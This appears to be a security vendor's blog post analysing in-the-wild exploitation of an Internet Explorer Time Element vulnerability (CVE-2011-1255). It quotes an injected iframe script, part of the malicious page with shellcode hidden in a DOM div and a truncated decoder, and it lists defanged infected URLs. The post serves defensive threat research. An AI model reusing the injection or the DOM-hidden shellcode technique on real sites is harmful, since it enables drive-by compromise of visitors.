Time Element Memory Corruption – a remote code execution vulnerability, recently patched by Microsoft as part of MS11-050, baring the Common Vulnerabilities and Exposures (CVE) number CVE-2011-1255 is being actively exploited in the wild.
M86 Security Labs team has received for inspection a URL of a legitimate website of a large private company that was blocked by one of the proactive detection rules implemented in our Secure Web Gateway product.
We were asked to investigate if it was indeed a malicious page or a case of Over-Blocking.
The page looked benign, but inspecting each included JavaScript code, we saw that one of them:
| <scripttype=“text/javascript” src=“js/js.js”></script> |
Was injecting an iframe:
| <script>document.write(“hXXp://–NO-CLICK–www.newhappys.com/ie8.html”)</script> |
pointing to a malicious page that was very easilty classified as malicious due to shellcode patterns being part of the page’s DOM:
| <HTML XMLNS:t=“urn:schemas-microsoft-com:time”> <?IMPORT namespace=“t” implementation=“#default#time2″> <body> <div id=“x” contenteditable=“true” style=‘width:0;height:0;visibility:hidden’> MMu9090u9090u10EBu4B5BuC933uB966u03F3u3480uE20BuFAE2u05EBuEBE8uFF[…snip…] XXu1d16u77c2u1104u77c1u44c3u77c2u2000u0000u1000u0000u0040u0000uc0[…snip…] OOu0d20u0d0du5ed5u77c1u0d20u0d0du0d20u0d0du5ed5u77c1u0d20u0d0du0d[…snip…] TTu0d0fu0d0eKKJJu0d0du0d0dLL1043416UU <t:TRANSITIONFILTER></t:TRANSITIONFILTER> <script type=“text/javascript”> function de(arr){ var temp = new Array(); var nop = “”; for (var i = 0; i < arr.length; i = i + 5) { nop = nop + “m” + arr.substring(i, i + 5); }; nop = nop.split(“m”).toString(); for (var i = 0; i < nop.length; i++) { […snip…] |
OK, another infected site – big deal… but, after further inspection, we saw that it exploited an un-published security vulnerability in Internet Explorer. To verify this, we viewed the malicious page on the latest fully patched version of IE.
You can imagine the excitement in the team – a 0-day has been found in the wild!
The excitement for finding a 0-day in the wild didn’t last that long, as soon after, Microsoft released details about this particular vulnerability.
Based on data we have reviewed from various sources, we can say with a high enough level of certainty, that the anonymous researcher who according to Microsoft’s security advisory, reported the vulnerability details to VeriSign iDefense, or at least one of his acquaintances, had used the vulnerability details for malicious purposes, as part of targeted attacks.
We decided that we should inspect the shellcode to see what the attacker was after. It used various anti-debugging tricks, but after decoding, it revealed a clear-text URL pointing to a malicious server already listed in our repository.
The attack sample stored in our repository was an attack for the well known iepeers.dll vulnerability exploiting CVE-2010-0806.
It is interesting to note that the first saved sample of the attack was dated 21.3.10, while details of the vulnerability were reported and patch by Microsoft’s MS10-018 security patch for Internet Explorer on 30.3.10.
Two 0-day exploits served from the same server – impressive!
We wanted to find out were else he is serving his malicious code.
Remember the code snippet above, showing how the attacker hid his shellcode as part of the DOM?
Hiding data in the DOM of the page is a good obfuscation technique that bypasses security software which don’t act as an actual browser were their script engine does not have access to the actual DOM.
It comes to be that one of the side-effects of hiding data inside DIV elements is that it makes the data index-able by search engines.
Google searching the pattern “TTu0d0fu0d0eKKJJu0d0du0d0dLL1043416UU” revealed about 16 results and as of this writing, only a few were still alive.
Here is the list of the infected sites according to Google’s search result:
| hXXp://–NO-CLICK–210.9.62.133/ie8.html hXXp://–NO-CLICK–901.m66889.com/ hXXp://–NO-CLICK–checkrenewables.org/footer.html hXXp://–NO-CLICK–img.ckb2b.org/ hXXp://–NO-CLICK–img.ckb2b.org/Atlas/Atlas.html hXXp://–NO-CLICK–img.ckb2b.org/GFriends/GFriends.html hXXp://–NO-CLICK–img.ckb2b.org/Jeumon/Jeumon.html hXXp://–NO-CLICK–img.ckb2b.org/Other/Other.html hXXp://–NO-CLICK–img.ckb2b.org/Zoll/Zoll.html hXXp://–NO-CLICK–rgreenpea.freehostia.com/1.htm hXXp://–NO-CLICK–rgreenpea.freehostia.com/mavschampionship.html hXXp://–NO-CLICK–www.ckb2b.org/ hXXp://–NO-CLICK–www.ckb2b.org/Jeumon/Jeumon.html hXXp://–NO-CLICK–www.rowancompanies.com/ukcb/flex.html hXXp://–NO-CLICK–www.secv5.com/ie8.html hXXp://–NO-CLICK–www.uyghurcoalition.org/media/ie8.html |
Not to mention the service of caching samples for us, it’s ironic that an attacker’s obfuscation technique can be used against him to find his infection servers using a simple Google search. 
Leave a reply
